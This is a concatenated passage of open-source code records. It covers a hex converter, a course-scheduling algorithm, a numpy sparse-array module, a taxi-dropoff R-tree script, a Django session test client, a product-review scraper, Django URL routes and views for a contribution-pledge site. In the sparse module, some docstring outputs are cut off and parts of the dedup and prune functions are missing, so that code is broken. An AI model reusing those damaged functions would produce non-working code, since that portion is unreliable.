10,\n \"B\": 11,\n \"C\": 12,\n \"D\": 13,\n \"E\": 14,\n \"F\": 15\n }\n \n expo = 0\n \n arr_hex = map(str,str(n_hex).upper())\n\n arr_hex = list(arr_hex)\n\n arr_hex.reverse()\n\n result = 0\n\n for n in arr_hex:\n num = int(letras[n]) if n in letras else int(n)\n result = result + (num * (base**expo))\n expo = expo + 1\n\n return result\n","sub_path":"com/conversor/conversores.py","file_name":"conversores.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"639317393","text":"from collections import deque\n\n\nclass Solution:\n \"\"\"\n @param: numCourses: a total of n courses\n @param: prerequisites: a list of prerequisite pairs\n @return: the course order\n \"\"\"\n\n def findOrder(self, numCourses, prerequisites):\n # write your code here\n edges = {i: [] for i in range(numCourses)}\n indegrees = [0 for i in range(numCourses)]\n for pair in prerequisites:\n edges[pair[1]].append(pair[0])\n indegrees[pair[0]] += 1\n\n queue = deque([x for x in range(numCourses) if indegrees[x] == 0])\n result = []\n while queue:\n node = queue.popleft()\n result.append(node)\n for neighbor in edges[node]:\n indegrees[neighbor] -= 1\n if indegrees[neighbor] == 0:\n queue.append(neighbor)\n\n return result if len(result) == numCourses else []","sub_path":"616_Course_Schedule_II.py","file_name":"616_Course_Schedule_II.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"188691858","text":"# Copyright (c) 2014 Evalf\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n\"\"\"\nThe sparse module defines a dtype for numpy that represents sparse data in\nn-dimensional coo-format. That is, every array element contains an index into a\nlarger sparse object, and a value, which can be of any numpy supported data\ntype including integers, floating point values and complex data. Additionally,\nthe dtype carries the shape of the sparse object as metadata, which makes the\nnumpy array into an entirely self contained sparse object.\n\nIn addition to the dtype, the sparse module provides a range of methods for\nmanipulation of sparse data, such as deduplication of indices, pruning of\nzeros, sparse addition, and conversion to other sparse or dense data formats.\n\"\"\"\n\nimport numpy\n\nchunksize = 0x10000000 # 256MB\n\ndef dtype(shape, vtype=numpy.float64):\n '''Numpy data dtype for sparse data.\n\n Returns a structured dtype with fields 'index' and 'value', where index is\n again structured with fields 'i0', 'i1', etc, and value is of type ``vtype``.\n The indices are of the smallest unsigned integer type that can encode all\n indices within ``shape``, and carry the shape as metadata.\n\n Args\n ----\n shape : :class:`tuple` of integers.\n Shape of the sparse object.\n vtype : :class:`numpy.dtype` or :class:`str`\n Data dype of the sparse object (i.e. the nonzero values).\n\n Returns\n -------\n dtype : :class:`numpy.dtype`\n The sparse dtype.\n '''\n\n return _dtype([((int(n), 'i'+str(i)), '>u'+str(1 if n <= 256 else 2 if n <= 256**2 else 4 if n <= 256**4 else 8)) for i, n in enumerate(shape)], vtype)\n\ndef issparse(data):\n return isinstance(data, numpy.ndarray) and issparsedtype(data.dtype)\n\ndef issparsedtype(dtype):\n return dtype.names == ('index', 'value') and all(\n len(value) == 3 and isinstance(value[2], int) and 0 <= value[2] < 256**value[0].itemsize\n for value in dtype['index'].fields.values())\n\ndef ndim(data):\n '''Dimension of the sparse object.'''\n\n return len(data.dtype['index'].names)\n\ndef shape(data):\n '''Shape of the sparse object.'''\n\n itype = data.dtype['index']\n return tuple(itype.fields[name][2] for name in itype.names)\n\ndef indices(data):\n '''Tuple of indices of the nonzero values of the sparse object.'''\n\n index = data['index']\n return tuple(index[i] for i in index.dtype.names)\n\ndef values(data):\n '''Nonzero values of the sparse object.'''\n\n return data['value']\n\ndef extract(data):\n '''Tuple of indices, values, and shape of the sparse object.'''\n\n return indices(data), values(data), shape(data)\n\ndef empty(shape, vtype=numpy.float64):\n '''Completely sparse array of given shape and data type.'''\n\n return numpy.empty(0, dtype=dtype(shape, vtype))\n\ndef result_type(dtype0, *dtypes):\n '''Sparse analogue of :func:`numpy.result_type`.'''\n\n if not dtypes:\n return dtype0\n if any(dtype['index'] != dtype0['index'] for dtype in dtypes):\n raise Exception('non-matching shapes')\n return _dtype(dtype0['index'], numpy.result_type(dtype0['value'], *[dtype['value'] for dtype in dtypes]))\n\ndef dedup(data, inplace=False):\n '''Deduplicate indices.\n\n Dedup sorts data in lexicographical order and sums all values with matching\n indices such that the returned array has at most one value per sparse index.\n The sorting happens in place, which means that ``dedup`` changes the order of\n the input argument. Additionally, if ``inplace`` is true, the deduplication\n step reuses the input array's memory. This may affect the size of the array,\n which should no longer be used after deduplication in place. In case the\n input has no duplicates the input array is returned.\n\n >>> from nutils.sparse import dtype, dedup\n >>> from numpy import array\n >>> A = array([((0,1),.1), ((1,0),.2), ((0,1),.3)], dtype=dtype([2,2]))\n >>> dedup(A)\n array([((0, 1), 0.4), ((1, 0), 0.2)],\n dtype=[('index', [((2, 'i0'), 'u1'), ((2, 'i1'), 'u1')]), ('value', ' n[i]\n chunk = buf[:len(s)] if overlap else data[i:i+len(s)]\n numpy.take(data['index'], n[i:i+len(s)], out=chunk['index'])\n chunk['value'].fill(0)\n numpy.add.at(chunk['value'], numpy.arange(len(s)).repeat(s), data['value'][n[i]:n[i+len(s)]])\n if overlap:\n data[i:i+len(s)] = chunk\n return _resize(data, len(n)-1)\n else:\n offsets = keep.cumsum()\n dedup = numpy.empty(offsets[-1]+1, dtype=data.dtype)\n dedup[0] = data[0]\n numpy.compress(keep, data['index'][1:], out=dedup['index'][1:])\n dedup['value'][1:].fill(0)\n numpy.add.at(dedup['value'], offsets, data['value'][1:])\n return dedup\n\ndef prune(data, inplace=False):\n '''Prune zero values.\n\n Prune returns a sparse object with all zero values removed. If ``inplace`` is\n true the returned object reuses the input array's memory. This may affect the\n size of the array, which should no longer be used after pruning in place. In\n case the input has no zeros the input array is returned.\n\n >>> from nutils.sparse import dtype, prune\n >>> from numpy import array\n >>> A = array([((0,1),.1), ((1,0),0), ((0,1),.3)], dtype=dtype([2,2]))\n >>> prune(A)\n array([((0, 1), 0.1), ((0, 1), 0.3)],\n dtype=[('index', [((2, 'i0'), 'u1'), ((2, 'i1'), 'u1')]), ('value', ' s[0]\n chunk = buf[:len(s)] if overlap else data[i:i+len(s)]\n numpy.take(data, s, out=chunk)\n if overlap:\n data[i:i+len(s)] = chunk\n return _resize(data, len(nz))\n else:\n return numpy.compress(data['value'], data)\n\ndef add(datas):\n '''Add sparse objects.\n\n Returns the sum of a list of sparse objects by concatenating the sparse\n entries. The returned array is of the data type mandated by Numpy's promotion\n rules. In case ``datas`` contains only one item of nonzero length and this\n item has the correct data type, then this array is returned as-is.\n\n >>> from nutils.sparse import dtype, add\n >>> from numpy import array\n >>> A = array([((0,1),.1), ((1,0),.2)], dtype=dtype([2,2]))\n >>> B = array([((0,1),.3)], dtype=dtype([2,2]))\n >>> add([A, B])\n array([((0, 1), 0.1), ((1, 0), 0.2), ((0, 1), 0.3)],\n dtype=[('index', [((2, 'i0'), 'u1'), ((2, 'i1'), 'u1')]), ('value', '>> from nutils.sparse import dtype, toarray\n >>> from numpy import array\n >>> A = array([((0,1),.1), ((1,0),.2), ((0,1),.3)], dtype=dtype([2,2]))\n >>> toarray(A)\n array([[ 0. , 0.4],\n [ 0.2, 0. ]])\n '''\n\n indices, values, shape = extract(data)\n if not shape:\n return values.sum()\n retval = numpy.zeros(shape, values.dtype)\n numpy.add.at(retval, indices, values)\n return retval\n\ndef fromarray(data):\n '''Convert dense array to sparse object.\n\n >>> from nutils.sparse import dtype, fromarray\n >>> from numpy import array\n >>> A = array([[0, .4], [.2, 0]])\n >>> fromarray(A)\n array([((0, 0), 0. ), ((0, 1), 0.4), ((1, 0), 0.2), ((1, 1), 0. )],\n dtype=[('index', [((2, 'i0'), 'u1'), ((2, 'i1'), 'u1')]), ('value', ' testy) != (vj.y > testy)) and (testx < (vj.x - vi.x) * (testy - vi.y) / (vj.y - vi.y) + vi.x)):\n\t\t\t\tc = not(c)\n\n\t\t\tif(vi.x == firstX and vi.y == firstY):\n\t\t\t\ti = i + 1\n\t\t\t\tif (i < nvert):\n\t\t\t\t\tvi = self.points[i];\n\t\t\t\t\tfirstX = vi.x;\n\t\t\t\t\tfirstY = vi.y;\n\t\t\tj = i\n\t\t\ti = i + 1\n\t\treturn c\n\n\tdef bounds(self):\n\t\treturn self.bound\n\n# Create a simple polygon\nglobal jfk\njfk = Polygon([Point(-73.7712, 40.6188),Point(-73.7674, 40.6233),Point(-73.7681, 40.6248),Point(-73.7657, 40.6281),Point(-73.7472, 40.6356),Point(-73.7468, 40.6422),Point(-73.7534, 40.6469),Point(-73.7544, 40.6460),Point(-73.7745, 40.6589),Point(-73.7858, 40.6628),Point(-73.7891, 40.6634),Point(-73.7903, 40.6655),Point(-73.8021, 40.6658),Point(-73.8146, 40.6632),Point(-73.8210, 40.6638),Point(-73.8244, 40.6621),Point(-73.8248, 40.6546),Point(-73.8212, 40.6469),Point(-73.7848, 40.6302),Point(-73.7899, 40.6223),Point(-73.7831, 40.6203),Point(-73.7782, 40.6274),Point(-73.7731, 40.6235),Point(-73.7738, 40.6193),Point(-73.7712, 40.6188)])\n\t\nglobal lga\nlga = Polygon([Point(-73.8888, 40.7662),Point(-73.8898, 40.7736),Point(-73.8843, 40.7751),Point(-73.8852, 40.7808),Point(-73.8795, 40.7812),Point(-73.8788, 40.7842),Point(-73.8751, 40.7827),Point(-73.8711, 40.7864),Point(-73.8673, 40.788),Point(-73.868, 40.7832),Point(-73.8716, 40.7808),Point(-73.8534, 40.773),Point(-73.8557, 40.7697),Point(-73.8505, 40.7673),Point(-73.85, 40.7645),Point(-73.8529, 40.7637),Point(-73.856, 40.7676),Point(-73.8594, 40.7659),Point(-73.8625, 40.7654),Point(-73.8672, 40.7693),Point(-73.8732, 40.7714),Point(-73.8871, 40.7697),Point(-73.8866, 40.7665),Point(-73.8888, 40.7662)])\n\n\ndef simplePolygonTest():\n\tprint(\"Point in polygon test\")\n\n\tcount = 0\n\t# Test if the polygon contains the two points\n\twith open('C:/Lab10/taxigreen(06-15)_table.csv') as csvfile:\n\t\treader = csv.DictReader(csvfile)\n\t\tstart_time = time.time() # Record query execution time\n\t\tfor row in reader:\n\t\t\ttry:\n\t\t\t\tpt = Point(float(row['Dropoff_longitude']), float(row['Dropoff_latitude']))\n\t\t\t\tif jfk.contains(pt): # Switch between jfk and lga for counting the number of in polygon\n\t\t\t\t\tcount +=1\n\n\t\t\texcept ValueError:\n\t\t\t\tcontinue\n\n\t\tprint(\"--- JFK without R-tree index: %d rows in set (%s sec) ---\" % (count,(time.time() - start_time)))\n\n\tcount = 0\n\t# Test if the polygon contains the two points\n\twith open('C:/Lab10/taxigreen(06-15)_table.csv') as csvfile:\n\t\treader = csv.DictReader(csvfile)\n\t\tstart_time = time.time() # Record query execution time\n\t\tfor row in reader:\n\t\t\ttry:\n\t\t\t\tpt = Point(float(row['Dropoff_longitude']), float(row['Dropoff_latitude']))\n\t\t\t\tif lga.contains(pt): # Switch between jfk and lga for counting the number of in polygon\n\t\t\t\t\tcount +=1\n\n\t\t\texcept ValueError:\n\t\t\t\tcontinue\n\n\t\tprint(\"--- LGA without R-tree index: %d rows in set (%s sec) ---\" % (count,(time.time() - start_time)))\n\n\ndef simpleRTree():\n\tprint(\"R-tree test\")\n\tidx = index.Index()\n\tglobal count\n\tcount = 0\n\ti = 1\n\twith open('C:/Lab10/sample-taxi-data.csv') as csvfile:\n\t\treader = csv.DictReader(csvfile)\n\t\tfor row in reader:\n\t\t\ttry:\n\t\t\t\t# Insert the points into the R-tree index\n\t\t\t\tpt = Point(float(row['Dropoff_longitude']), float(row['Dropoff_latitude']))\n\t\t\t\tidx.insert(i,(pt.x,pt.y,pt.x,pt.y))\n\t\t\t\ti +=1\n\t\t\texcept ValueError:\n\t\t\t\tcontinue\n\t\t\n \n \n\t# Query. This library only supports rectangular queries\n\t# Perform the query\n\tprint(\"Query result:\")\n\tstart_time = time.time() # Record query execution time\n\tresults1 = list(idx.intersection(jfk.bound))\n\tresults2 = list(idx.intersection(lga.bound)) \n\tprint(len(results1))\n\tprint(len(results2))\n\tprint(\"--- rows in set (%s sec) ---\" % ((time.time() - start_time)) ) \n\n\n\n# start_time = time.time()\n\n# simplePolygonTest()\nsimpleRTree()\n\n# print(\"--- %d rows in set (%s sec) ---\" % (count,(time.time() - start_time)) )","sub_path":"spatial.py","file_name":"spatial.py","file_ext":"py","file_size_in_byte":4513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"176881251","text":"from django.test import TestCase\nfrom django.test.client import Client\n\nfrom django.conf import settings\nfrom django.contrib.auth import authenticate, login\nfrom django.utils.importlib import import_module\nfrom django.http import HttpRequest, SimpleCookie\n\nclass Client(Client):\n\n def login(self, **credentials):\n \"\"\"\n Sets the Factory to appear as if it has successfully logged into a site.\n\n Returns True if login is possible; False if the provided credentials\n are incorrect, or the user is inactive, or if the sessions framework is\n not available.\n \"\"\"\n user = authenticate(**credentials)\n if user and user.is_active \\\n and 'user_sessions' in settings.INSTALLED_APPS:\n engine = import_module(settings.SESSION_ENGINE)\n\n # Create a fake request to store login details.\n request = HttpRequest()\n if self.session:\n request.session = self.session\n else:\n request.session = engine.SessionStore('ua', '127.0.0.1')\n login(request, user)\n\n # Save the session values.\n request.session.save()\n\n # Set the cookie to represent the session.\n session_cookie = settings.SESSION_COOKIE_NAME\n self.cookies[session_cookie] = request.session.session_key\n cookie_data = {\n 'max-age': None,\n 'path': '/',\n 'domain': settings.SESSION_COOKIE_DOMAIN,\n 'secure': settings.SESSION_COOKIE_SECURE or None,\n 'expires': None,\n }\n self.cookies[session_cookie].update(cookie_data)\n\n return True\n else:\n return False\n\n def logout(self):\n \"\"\"\n Removes the authenticated user's cookies and session object.\n\n Causes the authenticated user to be logged out.\n \"\"\"\n session = import_module(settings.SESSION_ENGINE).SessionStore('ua', '127.0.0.1')\n session_cookie = self.cookies.get(settings.SESSION_COOKIE_NAME)\n if session_cookie:\n session.delete(session_key=session_cookie.value)\n self.cookies = SimpleCookie()\n\nclass TestCase(TestCase):\n \"\"\"Our Client should use the user_session\"\"\"\n client_class = Client\n\n","sub_path":"user_sessions/testclient.py","file_name":"testclient.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"241035955","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 5 09:55:10 2019\n\n@author: ninenins\n\"\"\"\n\n# for loop has range(start stop,step)\n# defualt (0,step,1) \n\n## compare the while and for loops\n#########################################\nprint(\"The while loop results\")\nn = 0\nwhile n < 5:\n print(n)\n n += 1\n## the for loop\nprint(\"The for loop results\")\nfor m in range (5):\n print(m)\n \n## loop through a tuple\nmonths = (\"January\",\"February\",\"March\",\"April\",\"Octorber\",\"December\")\nfor item in months:\n if \"r\" in item.lower():\n print(item)\n ## the outer loop \nfor m in range(1,6):\n ## the inner loop\n for n in range (1,6):\n print(m, \"x\", n, \"=\", m*n, \"\\t\",end=\" \")\n \n## show how to create a list by reading a file of strings\n## using a for loop\ndataList = []\n\ninfile = open(\"/Users/ninenins/Desktop/python/课本/DataFile.txt\",\"r\")\n\nfor line in infile:\n dataList.append(line.strip())\ninfile.close()\n\nprint(dataList)\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n\n\n\n\n","sub_path":"课堂笔记/3:5.py","file_name":"3:5.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"639479872","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\nfrom openerp import models, fields, api, _\nfrom openerp.exceptions import ValidationError\n\nclass CommercialFishingLicenseRequest(models.Model):\n _inherit = 'elicense.request.commercial'\n\n def confirm(self):\n if not self.remarks:\n self.remarks = ''\n if self.vessel_id.changing_ton_gross:\n self.remarks += _(u\" - Vessel license no. %s is in gross tonnage size changing procedure.\\n\") % (self.vessel_id.ship_code)\n if self.vessel2_id.changing_ton_gross:\n self.remarks += _(u\" - Vessel license no. %s is in gross tonnage size changing procedure.\\n\") % (self.vessel2_id.ship_code)\n super(CommercialFishingLicenseRequest, self).confirm()\n","sub_path":"elicense_commercial_changing_tgross/models/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"493070979","text":"import cv2\nimport numpy\n\n# drawing rectangle\n\nimg = cv2.imread('me.jpg')\ncv2.rectangle(img, (600, 100), (1800, 1600), (255, 255, 255), 10) # x1, y1 and x2, y2 and 10 represent thickness of rectangle\ncv2.imwrite('rectangle_in_img.jpg', img)\nimg = cv2.resize(img, (700, 500))\ncv2.imshow('rectangle', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n\n\n","sub_path":"Rectangle.py","file_name":"Rectangle.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"520860030","text":"# -*- coding: utf-8 -*-\n# nearest_time.py\n################################################################\n################################################################\n#Python script to calculate the time when the orbit approached\n#the epicenter most.\n#===============================================================\n#Explanation of each object:\n#---------------------------------------------------------------\n#t1 :an object which contains starting time.\n#file_names :a list object which contains the names of\n# the files.\n# where orbit data is preserved.\n#list_file :a list object which will contain the file\n# names not meeting the requirements.\n#df :a data frame object which contains the input\n# data.\n#min_val :an object which contains the minimum value of the\n# distance between the data point and the epicenter.\n#list1 :a list object which contains the distance data.\n#min_index_num :an object which contains the index where the\n# distance becomes the minimum.\n#base_time :an object which contains the time when the\n# distance becomes minimum.\n#output_list :a data frame object which contains the names of\n# files not meeting the requirements.\n#t2 :an object which contains finishing time.\n#elapsed_time :an object which contains elapsed time.\n#***************************************************************\n#Structure of this \"nearest_time.py\" script:\n#---------------------------------------------------------------\n#\n#[1. Importing modules]\n#1-1. Importing pandas, time and glob modules.\n#\n#\n#[2. measuring execution time]\n#2-1. measuring starting time with time module\n#\n#\n#[3. Exporting file names.]\n#3-1. Exporting file names.\n#\n#\n#[4. Making a list object.]\n#4-1. Making a list object which will contain the file names\n# which do not meet the requirements.\n#\n#\n#[5. Calculating the time when the orbit approached\n# the epicenter most.]\n#5-1. Importing the data from a csv file.\n#5-2. Resetting the index.\n#5-3. Extracting the distance to check whether the point\n# meet the distance requirement.\n#5-4. Converting the data frame data into a list format data.\n#5-5. Extracting the index value where the distance is the\n# minimum.\n#5-6. Setting the time to zero when the distance is the minimum.\n#5-7. Modifying other time value according to the time when\n# the distance is the minimum.\n#5-8. Confirming whether the data covers from -250 to 250.\n# If so, the data is exported. Otherwise, not exported.\n#\n#5-9. Exporting the file names which do not covers the time from\n# from -250 to 250.\n#\n#\n#[6. measuring execution time]\n#6-1. Measuring finishing time with time module.\n#6-2. Output elapsed time.\n#\n################################################################\n################################################################\n#\n#[1. Importing modules]\n#1-1. Importing pandas, time and glob modules.\n#\nimport pandas as pd\nimport time\nimport glob\n#\n#\n#[2. measuring execution time]\n#2-1. measuring starting time with time module\n#\nt1 = time.time()\n#\n#\n#[3. Exporting file names.]\n#3-1. Exporting file names.\n#\nfile_names = glob.glob(\".\\\\for_stacking_distance\\\\dist*\")\n#\n#\n#[4. Making a list object.]\n#4-1. Making a list object which will contain the file names\n# which do not meet the requirements.\n#\nlist_file = []\n#\n#\n#[5. Calculating the time when the orbit approached\n# the epicenter most.]\n#\nfor i in range(len(file_names)):\n#\n#5-1. Importing the data from a csv file.\n#\n df = pd.read_csv(file_names[i],index_col = 0)\n#\n#5-2. Resetting the index.\n#\n df.reset_index(drop = True, inplace = True)\n#\n#5-3. Extracting the distance to check whether the point\n# meet the distance requirement.\n#\n min_val = min(df[\"distance\"])\n if min_val >330:\n continue\n#\n#5-4. Converting the data frame data into a list format data.\n#\n list1 = list(df[\"distance\"])\n#\n#5-5. Extracting the index value where the distance is the\n# minimum.\n#\n min_index_num = list1.index(min_val)\n#\n#5-6. Setting the time to zero when the distance is the minimum.\n#\n base_time = df.iloc[min_index_num, 16]\n#\n#5-7. Modifying other time value according to the time when\n# the distance is the minimum.\n#\n df[\"adjusted_time\"] = df.iloc[:,16]-base_time\n#\n#5-8. Confirming whether the data covers from -250 to 250.\n# If so, the data is exported. Otherwise, not exported.\n#\n if (df.iloc[0,17] < -250 and df.iloc[len(df)-1,17] >250):\n output_name = file_names[i].replace(\".\\\\for_stacking_distance\\\\dist\",\"stacking\")\n df.to_csv(output_name)\n else:\n list_file.append(file_names[i])\n#\n#5-9. Exporting the file names which do not covers the time from\n# from -250 to 250.\n#\noutput_list = pd.DataFrame(list_file)\noutput_list.to_csv(\"non_concide_list.csv\")\n#\n#\n#[6. measuring execution time]\n#6-1. Measuring finishing time with time module.\n#\nt2 = time.time()\nelapsed_time = t2-t1\nelapsed_time = round(elapsed_time,3)\n#\n#6-2. Output elapsed time.\n#\nprint(\"elapsed time = \", elapsed_time, \"sec and in hour, \",elapsed_time/3600)\n#\n################################################################\n","sub_path":"9_moving_average/2./stacking_ver3.py","file_name":"stacking_ver3.py","file_ext":"py","file_size_in_byte":5247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"635026470","text":"import requests\nimport re\nfrom urllib.parse import urlencode\nimport time\n\ndef get_html(url, page):\n header = {\n \"Accept\": \"application/json, text/javascript, */*; q=0.01\",\n \"Accept-Language\": \"zh-CN,zh;q=0.9\",\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36\",\n }\n params = {\n # 'callBack': 'fetchJSON_comment98',\n 'productID': 100019867468,\n 'score': 0,\n 'sortType': 6,\n 'page': page,\n 'pageSize': 10,\n 'isShadowSku': 0,\n 'rid': 0,\n 'fold': 1\n }\n res = \"\"\n url = url + urlencode(params)\n try:\n req = requests.get(url = url, params = params, headers = header)\n time.sleep(0.5)\n print(req.text)\n\n except Exception as e:\n print('erro', e)\n\nif __name__ == '__main__':\n url = 'https://club.jd.com/comment/productPageComments.action?'\n for i in range(10):\n get_html(url, i)","sub_path":"requests_spider.py","file_name":"requests_spider.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"499753026","text":"from django.conf import settings\nfrom django.conf.urls import include, patterns, url\nfrom django.contrib import admin\nfrom django.contrib.sites.models import Site\nfrom www.views.auth import login, logout\nfrom www.views.main import index, test, support, ajax_contact, documentation, demo, signup\nfrom www.views.site import site\nfrom www.views.sites import sites, site_create, site_update, user, visits\nfrom api import urls as api_urls\n\n\nadmin.autodiscover()\nadmin.site.unregister(Site)\n\nurlpatterns = patterns('',\n url(r'^$', index, name='index'),\n url(r'^login/$', login, name='login'),\n url(r'^logout/$', logout, name='logout'),\n url(r'^demo/$', demo, name='demo'),\n url(r'^signup/$', signup, name='signup'),\n url(r'^sites/$', sites, name='sites'),\n url(r'^sites/new/$', site_create, name='site_create'),\n url(r'^sites/(?P\\w+)/edit/$', site_update, name='site_update'),\n url(r'^sites/(?P\\w+)/$', site, name='site'),\n url(r'^sites/(?P\\w+)/(?P\\w+)/$', user, name='user'),\n url(r'^sites/(?P\\w+)/(?P\\w+)/(?P\\w+)/$', visits, name='visits'),\n url(r'^ajax/contact/$', ajax_contact, name='ajax_contact'),\n url(r'^test/$', test, name='test'),\n url(r'^support/$', support, name='support'),\n url(r'^documentation/$', documentation, name='documentation'),\n url(r'^api/', include(api_urls)),\n url(r'^admin/', include(admin.site.urls)),\n)\n\n# Serve assets for now.\nurlpatterns += patterns('',\n (r'^assets/(?P.*)$', 'django.views.static.serve', {\n \t'document_root': settings.STATIC_ROOT\n }),\n)\n\nurlpatterns += patterns('',\n url(r'^robots\\.txt$', 'django.views.static.serve', {\n 'path': 'assets/robots.txt',\n 'document_root': settings.WWW_ROOT,\n }),\n url(r'^favicon\\.ico$', 'django.views.static.serve', {\n 'path': 'assets/img/apple-touch-icon.png',\n 'document_root': settings.WWW_ROOT,\n }),\n url(r'^apple-touch-icon\\.png$', 'django.views.static.serve', {\n 'path': 'assets/img/apple-touch-icon.png',\n 'document_root': settings.WWW_ROOT,\n }),\n url(r'^apple-touch-icon-precomposed\\.png$', 'django.views.static.serve', {\n 'path': 'assets/img/apple-touch-icon.png',\n 'document_root': settings.WWW_ROOT,\n }),\n)","sub_path":"www/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"551772208","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.decorators.http import require_http_methods\nfrom django.views.decorators.csrf import csrf_exempt, ensure_csrf_cookie\nfrom django.db import transaction\nfrom django.db.models import Q, Count\nfrom django.http import HttpResponse, HttpResponseRedirect, HttpResponseForbidden, Http404\nfrom django.conf import settings\n\nfrom twostream.decorators import anonymous_view, user_view_for\n\nfrom contrib.models import Trigger, TriggerStatus, TriggerExecution, ContributorInfo, Pledge, PledgeStatus, PledgeExecution, PledgeExecutionProblem, Contribution, ActorParty, IncompletePledge, TriggerCustomization\nfrom contrib.utils import json_response\nfrom contrib.bizlogic import HumanReadableValidationError, run_authorization_test\n\nimport copy\nimport rtyaml\nimport random\nimport decimal\n\ndef get_user_pledges(user, request):\n\t# Returns the Pledges that a user owns as a QuerySet.\n\t# (A simple \"|\" of QuerySets is easier to construct but it creates a UNION\n\t# that then requires a DISTINCT which in Postgres is incompatible with\n\t# SELECT FOR UPDATE. So we form a proper 'WHERE x OR y' clause.)\n\t\n\tfilters = Q(id=-99999) # a dummy filter that excludes everything, in case no other filters apply\n\n\tif user and user.is_authenticated():\n\t\tfilters |= Q(user=user)\n\n\tanon_user = request.session.get(\"anonymous-user\")\n\tif anon_user is not None:\n\t\tfilters |= Q(anon_user_id=anon_user)\n\n\treturn Pledge.objects.filter(filters)\n\n\n@require_http_methods(['POST'])\n@ensure_csrf_cookie\n@json_response\ndef get_user_defaults(request):\n\t# A user is in the process of making a pledge and wants to log in.\n\t# Authenticate, log them in, and then return default values to\n\t# pre-populate fields like their name & address.\n\n\t# authenticate\n\tfrom itfsite.accounts import User\n\tfrom itfsite.betteruser import LoginException\n\ttry:\n\t\tuser = User.authenticate(request.POST['email'].strip(), request.POST['password'].strip())\n\texcept LoginException as e:\n\t\treturn { \"status\": \"NotValid\", \"message\": str(e) }\n\n\t# check that the user hasn't already done this\n\ttrigger = Trigger.objects.get(id=request.POST['trigger'])\n\tif trigger.pledges.filter(user=user).exists():\n\t\treturn { \"status\": \"AlreadyPledged\" }\n\n\t# login() resets the CSRF token. This might be redundant, but\n\t# @ensure_csrf_cookie ensures that we send that CSRF token in\n\t# the response (as a cookie). The twostream library will detect\n\t# the new token in the AJAX response.\n\tfrom django.contrib.auth import login\n\tlogin(request, user)\n\n\t# Return the user's past contributor information to pre-populate fields.\n\treturn get_recent_pledge_defaults(user, request)\n\ndef get_recent_pledge_defaults(user, request):\n\t# Return a dictionary of information submitted with the user's most recent pledge\n\t# so that we can pre-fill form fields.\n\n\tret = { }\n\n\t# Get the user's most recent Pledge. If the user has no Pledges,\n\t# just return the empty dict.\n\tpledges = get_user_pledges(user, request)\n\tpledge = pledges.order_by('-created').first()\n\tif not pledge:\n\t\treturn ret\n\n\t# How many open pledges does this user already have?\n\tret['open_pledges'] = pledges.filter(status=PledgeStatus.Open).count()\n\n\t# Copy Pledge fields.\n\tret['emailEmail'] = pledge.get_email()\n\tfor field in ('amount', 'incumb_challgr', 'filter_party', 'filter_competitive'):\n\t\tret[field] = getattr(pledge, field)\n\t\tif type(ret[field]).__name__ == \"Decimal\":\n\t\t\tret[field] = float(ret[field])\n\t\telif isinstance(ret[field], ActorParty):\n\t\t\tret[field] = str(ret[field])\n\n\t# Copy contributor fields from the profile's extra dict.\n\tfor field in ('contribNameFirst', 'contribNameLast', 'contribAddress', 'contribCity', 'contribState', 'contribZip',\n\t\t'contribOccupation', 'contribEmployer'):\n\t\tret[field] = pledge.profile.extra['contributor'][field]\n\n\t# Return a summary of billing info to show how we would bill.\n\tret['cclastfour'] = pledge.profile.cclastfour\n\n\t# And indicate which pledge we're sourcing this from so that in\n\t# the submit view we can retreive it again without having to\n\t# pass it back from the (untrusted) client.\n\tret['from_pledge'] = pledge.id\n\n\treturn ret\n\n# Validates the email address a new user is providing during\n# the pledge (user says they have no password). Returns \"OK\"\n# or a human-readable error message about the email address\n# not being 